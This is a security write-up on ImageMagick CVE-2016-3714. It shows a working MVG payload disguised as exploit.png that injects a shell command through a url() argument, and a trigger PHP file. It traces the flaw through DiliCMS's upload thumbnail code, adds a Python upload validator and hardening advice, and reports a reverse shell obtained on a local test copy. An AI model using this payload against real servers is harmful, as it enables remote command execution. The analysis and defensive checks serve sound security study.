ImageMagick

ImageMagick CVE-2016-3714 affects a wide range of software; the most common exposure is through PHP's Imagick extension.
Build exploit.png (an MVG text file saved under a .png name):

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls "-la)'
pop graphic-context

Then create the vul.php file, which does nothing but instantiate Imagick on that file:

<?php
// The .png extension does not decide the coder: Imagick sniffs the MVG text
// inside exploit.png and hands the url(...) argument to the delegate.
new Imagick('exploit.png');
?>


Requesting vul.php triggers command execution: the directory listing is displayed.

DiliCMS

Taking DiliCMS as the example:
in /admin/controllers/attachment.php, the thumbnail method calls $this->tailor->initialize($target, $ext); on the uploaded file.

......
private function thumbnail($model_type, $model, $target, $ext)
{
    //do we have thumbnail settings for target model?
    if ($model_type and $model and in_array($model_type, array('model', 'category'))) {
        if ($model_type == 'model') {
            $this->settings->load('model/' . $model);
            $target_model = $this->settings->item('models');
            $target_model = $target_model[$model];
        } elseif ($model_type == 'category') {
            $this->settings->load('category/cate_' . $model);
            $target_model = $this->settings->item('cate_models');
            $target_model = $target_model[$model];
        }
        $thumb_preferences = json_decode($target_model['thumb_preferences']);
        if ($thumb_preferences and count($thumb_preferences->enabled) > 0) {
            $thumbs_preferences = json_decode(setting('thumbs_preferences'));
            if ($thumbs_preferences) {
                $this->load->library('tailor');
                foreach ($thumbs_preferences as $pref) {
                    if (in_array($pref->size, $thumb_preferences->enabled)) {
                        // $target is the stored upload path, $ext the extension
                        // taken from the upload; neither is checked against the
                        // file's actual content before it reaches Imagick.
                        $this->tailor->initialize($target, $ext);
                        $this->tailor->measure($pref->size, $pref->rule);
                        $this->tailor->save($target.'.'.$pref->size);
                    }
                }
                return $thumb_preferences->default == 'original' ? '' : $thumb_preferences->default;
            }
        }
......

/shared/libraries/Tailor.php is where Imagick is used: initialize() instantiates it directly on the image path passed in.

class Tailor {

    protected $imagick = null;

    protected $ext = '';

    protected $app = null;

    protected $filePath = '';


    public function initialize($image, $ext)
    {
        // No magic-byte check and no coder prefix: ImageMagick sniffs the
        // content and will happily treat an MVG text file as an image.
        $this->imagick = new Imagick($image);
        $this->ext = strtolower($ext);
    }

    // measure(), save() and the remaining methods are elided here
}
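As an added example (not code from the post and not part of DiliCMS), the following is the input validation that Tailor::initialize() lacks, written in Python so it runs stand-alone; the function names, the sample files and the rejection messages are assumptions of this example. It serves both sections above: it flags the MVG text markers and the url(...) delegate-injection shape of exploit.png, and it checks that an upload's bytes really are the raster format its extension claims before returning a coder-prefixed path (the Imagick "png:/path" syntax), which pins the decoder so content sniffing never selects MVG or SVG.

```python
import re

# Magic bytes for the raster formats an attachment upload is allowed to contain.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
EXTENSION_ALIASES = {"png": "png", "jpg": "jpeg", "jpeg": "jpeg", "gif": "gif"}

# Text-based coders that ImageMagick's content sniffing may choose regardless of
# the extension: MVG (used in the post) and SVG both begin as plain text.
MVG_MARKERS = (b"push graphic-context", b"viewbox ", b"image over", b"fill 'url(")
SVG_MARKERS = (b"<svg", b"xlink:href")
# url(...) carrying a quote or shell metacharacter: the delegate-injection shape.
URL_INJECTION = re.compile(rb"url\([^)]*[\"'`|;&$]")


def sniff_format(data: bytes):
    """Format implied by the magic bytes, or None when it is not an allowed raster."""
    for magic, fmt in MAGIC.items():
        if data.startswith(magic):
            return fmt
    return None


def payload_indicators(data: bytes):
    """Names of the ImageTragick-style text markers found in the first 4 KiB."""
    head = data[:4096]
    lowered = head.lower()
    findings = []
    if any(marker in lowered for marker in MVG_MARKERS):
        findings.append("mvg-text")
    if any(marker in lowered for marker in SVG_MARKERS):
        findings.append("svg-text")
    if URL_INJECTION.search(head):
        findings.append("url-delegate-injection")
    return findings


def prepare_for_imagick(path: str, data: bytes, claimed_ext: str):
    """Return (coder_prefixed_path, None) when the upload may go to Imagick,
    or (None, reason) when it must be rejected.

    The "png:/path" prefix pins the decoder, so Imagick never falls back to
    sniffing the content as MVG/SVG text.
    """
    ext = EXTENSION_ALIASES.get(claimed_ext.lower())
    if ext is None:
        return None, f"extension .{claimed_ext} is not in the allowlist"
    detected = sniff_format(data)
    if detected is None:
        found = payload_indicators(data) or ["unrecognised-content"]
        return None, "content is not PNG/JPEG/GIF: " + ", ".join(found)
    if detected != ext:
        return None, f"extension says {ext} but content is {detected}"
    return f"{detected}:{path}", None


# Constructed samples, not real uploads: the MVG text from the post stored as
# exploit.png, a bare PNG signature plus IHDR chunk header, and a GIF renamed to .png.
EXPLOIT_PNG = (
    b"push graphic-context\n"
    b"viewbox 0 0 640 480\n"
    b"fill 'url(https://example.com/image.jpg\"|ls \"-la)'\n"
    b"pop graphic-context\n"
)
REAL_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17
RENAMED_GIF = b"GIF89a" + b"\x00" * 32

if __name__ == "__main__":
    for name, data, ext in (("exploit.png", EXPLOIT_PNG, "png"),
                            ("avatar.png", REAL_PNG, "png"),
                            ("renamed.png", RENAMED_GIF, "png")):
        coder_path, reason = prepare_for_imagick("/uploads/" + name, data, ext)
        verdict = "pass to Imagick as " + coder_path if coder_path else "REJECT: " + reason
        print(f"{name}: {verdict}")
```

In the PHP upload handler the same two checks are exif_imagetype() (or finfo) on the stored file compared against the extension, followed by new Imagick('png:' . $path) with the detected format as the prefix. This is the second line of defence: the first is ImageMagick's policy.xml disabling the EPHEMERAL, URL, HTTPS, MVG, MSL, TEXT, SHOW, WIN and PLT coders, as recommended for CVE-2016-3714, together with an upgraded ImageMagick.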

Verify

Testing against a locally deployed copy of the CMS: during the file upload, commands are executed and a reverse shell is obtained.
[screenshot of the verification omitted]